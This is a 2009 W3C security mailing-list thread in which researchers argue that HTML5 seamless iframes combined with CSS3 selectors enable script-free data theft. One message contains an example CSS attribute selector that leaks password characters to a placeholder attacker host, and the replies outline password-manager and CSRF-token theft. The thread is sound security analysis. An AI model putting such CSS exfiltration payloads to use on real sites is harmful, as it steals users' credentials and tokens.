- From: Collin Jackson <w3c@collinjackson.com>
- Date: Sat, 5 Dec 2009 10:05:25 -0800
- To: Adam Barth <w3c@adambarth.com>
- Cc: sird@rckc.at, public-web-security@w3.org
A few thoughts:
* The password stealing attack can already be accomplished using the
iframe to create a login page and prompting the user to type their
password. It's not necessary to use CSS3 or seamless.
* If the password manager is used, CSS3 + seamless lets you steal the
password without user interaction.
* However, if you can inject arbitrary CSS3 and a seamless iframe into
a page, there's a good chance you can inject a password field, so this
password manager attack doesn't require seamless, just CSS3.
* Many webapps include a CSRF token in every page as a hidden form
field. If the page that allows CSS3 injection includes such a token,
you don't need seamless iframes to steal the token.
It seems like CSS3 is adding a lot of attack surface, sites may need
to block arbitrary CSS3 injection regardless of seamless. That is
unfortunate since browser vendors have been removing expression,
-moz-binding, and other features that make CSS injection dangerous.
On Sat, Dec 5, 2009 at 8:54 AM, Adam Barth <w3c@adambarth.com> wrote:
> I see. The issue is that the attacker can inject CSS + iframes, but
> not script, into one page in an origin. Now with seemless+CSS3, the
> attacker can steal information from the entire origin. Very cool!
>
> Adam
>
>
> On Fri, Dec 4, 2009 at 6:39 AM, Eduardo Vela <sirdarckcat@gmail.com> wrote:
>> I sincerely understand why people want seamless iframes on HTML5.. I mean,
>> I've been there.. but sometimes the better way to do something is not to do
>> it.
>>
>> The perfect example are seamless iframes (defined in html5) and CSS3
>> selectors.
>>
>> I've showed (together with David Lindsay, and Gareth Heyes) expressed
>> several times that we think this is a bad idea.
>>
>> We always receive the same answer "seamless iframes are same-origin!" and
>> believe me, I know.. but guess what? javascript is also same origin.. and it
>> also creates problems.
>>
>> What I see with those awesome CSS3 selectors such as:
>>
>> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
>>
>> create a new type of XSS attacks, and those are purely CSS based XSS
>> attacks.. without JS.. that will allow an attacker to read arbitrary files
>> from the page WITHOUT the need of JS.
>>
>> I really hope people in here know that a cool feature is sometimes not such
>> a good idea, and hopefully, we can see how to resolve this issue..
>>
>> References: The Sexy Assassin - BlueHat 2008 Presentation http://p42.us/css/
>> Favorite XSS - BlackHat 2009 Presentation http://p42.us/favxss/
>> Stefano Di Paola PoC http://www.wisec.it/CssSteal/frame.html
>>
>> Greetings!!
>> -- Eduardo
>> http://www.sirdarckcat.net/
>>
>>
>
>
Received on Saturday, 5 December 2009 18:06:25 UTC